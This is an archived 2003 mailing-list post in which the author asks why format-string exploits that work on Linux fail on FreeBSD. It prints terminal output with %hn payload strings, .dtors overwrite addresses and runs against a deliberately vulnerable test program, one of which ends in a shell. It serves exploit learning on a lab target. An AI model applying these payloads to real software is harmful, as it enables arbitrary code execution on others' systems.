Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > vuln-dev > 03 > 060598.html (Request Expert securityfocus.com Support)

Formatstrings on *BSD

From: <Vail(at)gmx.net>
Date: Wed Jun 18 2003 - 10:38:48 EDT


hi folks, i got a question to formatstring attacks and the diff between linux and *BSD stack. I can manage
to exploit some vuln progs on linux, but every attempt to exploit the same on FreeBSD for example fails.

The only thing i could imagin is, that the stack behaviour is somewhat diff, so that for example
the build*.c from
http://www.linuxfocus.org/English/July2001/article191.shtml would produce fmts that are not compliant to fbsd... anyone a guess where the diff in exploiting fmt is? Or some good url/doc regarding
specifics on *BSD & fmt attacks?

First here my doing on linux (using the vuln.c from the link above): 

-------------------------------linux-------------------------------
admin@linux:~> objdump -s -j .dtors vuln

vuln: file format elf32-i386

Contents of section .dtors: 

 8049a64 ffffffff 00000000                    ........

admin@linux:~> ./bui2 8049a68 8
Calling ./bui2 ... 

adr : 134519400 (8049a68)
val : -1073744136 (bffff6f8)
valh: 49151 (bfff)
vall: 63224 (f6f8)

[%.49143x%8$hn%.14073x%9$hn] (34)
Calling ./vuln ...
sc = 0xbffff8be 
adr : 134519400 (8049a68)
val : -1073743682 (bffff8be)
valh: 49151 (bfff)
vall: 63678 (f8be)

[%.49143x%8$hn%.14527x%9$hn] (34)
0 0xbffff894
1 0xbffff89b
2 0xbffff8be
3 0xbffff8ec
4 0xbffff8f4
helloWorld() = 0x8048770
accessForbidden() = 0x80487b0

before : ptrf() = 0x8048770 (0xbffff5fc) buffer = 

[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000] (127)
after : ptrf() = 0x8048770 (0xbffff5fc)
Welcome in "helloWorld"
sh-2.05$ 
-------------------------------linux-------------------------------

Works quite fine ;)
Now, i changed the shellcode of build2 to fbsd shellcode and tried to exploit it: 

-------------------------------freebsd-------------------------------
> objdump -s -j .dtors vuln
Do you need help?X

vuln: file format elf32-i386

Contents of section .dtors: 

 8049958 ffffffff 00000000                    ........

> ./bui2 804995c 8

Calling ./bui2 ... 
adr : 134519132 (804995c)
val : -1077937316 (bfbffb5c)
valh: 49087 (bfbf)
vall: 64348 (fb5c)

[%.-16457x%8$hn%.15261x%9$hn] (35)
Calling ./vuln ...
sc = 0xbfbffc9f 
adr : 134519132 (804995c)
val : -1077936993 (bfbffc9f)
valh: 49087 (bfbf)
vall: 64671 (fc9f)

[%.-16457x%8$hn%.15584x%9$hn] (35)
0 0xbfbffc74
1 0xbfbffc7b
2 0xbfbffc9f
3 0xbfbffce4
4 0xbfbffcec
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0

before : ptrf() = 0x8048770 (0xbfbffa74) 

buffer = [2805f000                                                          
                                                    ] (127)
after : ptrf() = 0x8048770 (0xbfbffa74)
Welcome in "helloWorld"
Segmentation fault (core dumped) 
-------------------------------freebsd-------------------------------

I can try what i want (change values, shellcode, padding) it never executes a shell...

What i found out myself, is that some values to write with %n seem to trouble fbsd,
for example i wanted to write my shellcode-addr to 0xbfbffa74 (addr of the pointer), on
linux this works fine, on fbsd i get *strange* values after writing to 0xbfbffa74

> ./bui2 0xbfbffa74 8

Calling ./bui2 ... 

adr : -1077937548 (bfbffa74)
val : -1077937320 (bfbffb58)
valh: 49087 (bfbf)
vall: 64344 (fb58)

[vú¿¿tú¿¿%.-16457x%8$hn%.15257x%9$hn] (35) Calling ./vuln ...
sc = 0xbfbffc9f 
adr : -1077937548 (bfbffa74)
val : -1077936993 (bfbffc9f)
valh: 49087 (bfbf)
vall: 64671 (fc9f)

[vú¿¿tú¿¿%.-16457x%8$hn%.15584x%9$hn] (35) 0 0xbfbffc74
1 0xbfbffc7b
2 0xbfbffc9f
3 0xbfbffce4
4 0xbfbffcef
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0

before : ptrf() = 0x8048770 (0xbfbffa74) 

buffer = [vú¿¿tú¿¿2805f000                                                  
                                                            ] (127)
after : ptrf() = 0x40517d31 (0xbfbffa74) // 0x40517d31 !? THATS surely NOT my shellcode adress (it's sc = 0xbfbffc9f) Segmentation fault (core dumped)

Anyone a clue? 

-- 
+++ GMX - Mail, Messaging & more  
http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
Received on Wed Jun 18 13:40:45 2003
Do you need more help?X

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:40 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library